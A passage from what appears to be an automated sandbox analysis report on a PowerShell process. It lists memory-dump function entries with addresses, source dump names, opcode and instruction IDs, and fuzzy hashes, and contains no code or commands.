                                            • Snapshot File: hcaresult_11_2_7ffd9b950000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 34c4fb9d294938c82691e40d6b384e2be4deacc55872c278f004643f5f74a914
                                            • Instruction ID: a8a743c99361bab1c05fce395610e3906bdc469338ea1036e2773aa2cafd4e81
                                            • Opcode Fuzzy Hash: 34c4fb9d294938c82691e40d6b384e2be4deacc55872c278f004643f5f74a914
                                            • Instruction Fuzzy Hash: 96F0BE32B4E5098FD7A9EA9CE4519E873E0EF65320B1600BAE06DC72B7CA25EC40C741
                                            Function 00007FFD9B954400 Relevance: .0, Instructions: 35COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2207754965.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b950000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 01b154888f1f3c206bef50cf5dbecda22f418d2fdf3839bb6fa6f4990536d6b1
                                            • Instruction ID: dd1e6a92ac3ed16bb6159075bfe773dbda650f7da38fe6f2b115ca486aec9751
                                            • Opcode Fuzzy Hash: 01b154888f1f3c206bef50cf5dbecda22f418d2fdf3839bb6fa6f4990536d6b1
                                            • Instruction Fuzzy Hash: 05F0BE32A8E5498FD7A8EA9CE0609A873E0FF0532071600BAE05DCB1A7CA25BC40C740
                                            Function 00007FFD9B9541D1 Relevance: .0, Instructions: 29COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2207754965.00007FFD9B950000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B950000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b950000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction ID: ef0e477c3a8d88fbc3791122f3f41a252fcdd9f92c2fd245001ca178e7a9b1aa
                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                            • Instruction Fuzzy Hash: A8E0123175C4089FDAB8DA8CE0519A973E1EBA832171141BBD14EC7675CA21ED518B80

                                            Non-executed Functions

                                            Function 00007FFD9B888BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.2205360928.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_7ffd9b880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: N_^8$N_^<$N_^?$N_^J$N_^K$N_^N$N_^Q$N_^Y
                                            • API String ID: 0-2388461625
                                            • Opcode ID: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                            • Instruction ID: 0728ac4f663867965b4d9272348b3fd26a957d2408bba01e83cd5125a4c11520
                                            • Opcode Fuzzy Hash: 0a17b3c452628a29204579af913d24a375679f0f8c5c8a70c7dd2c4491a07189
                                            • Instruction Fuzzy Hash: 2321F9B3B045258AC30A37BCBD659D87B81DF5437834501F3E229CF553ED64648B8782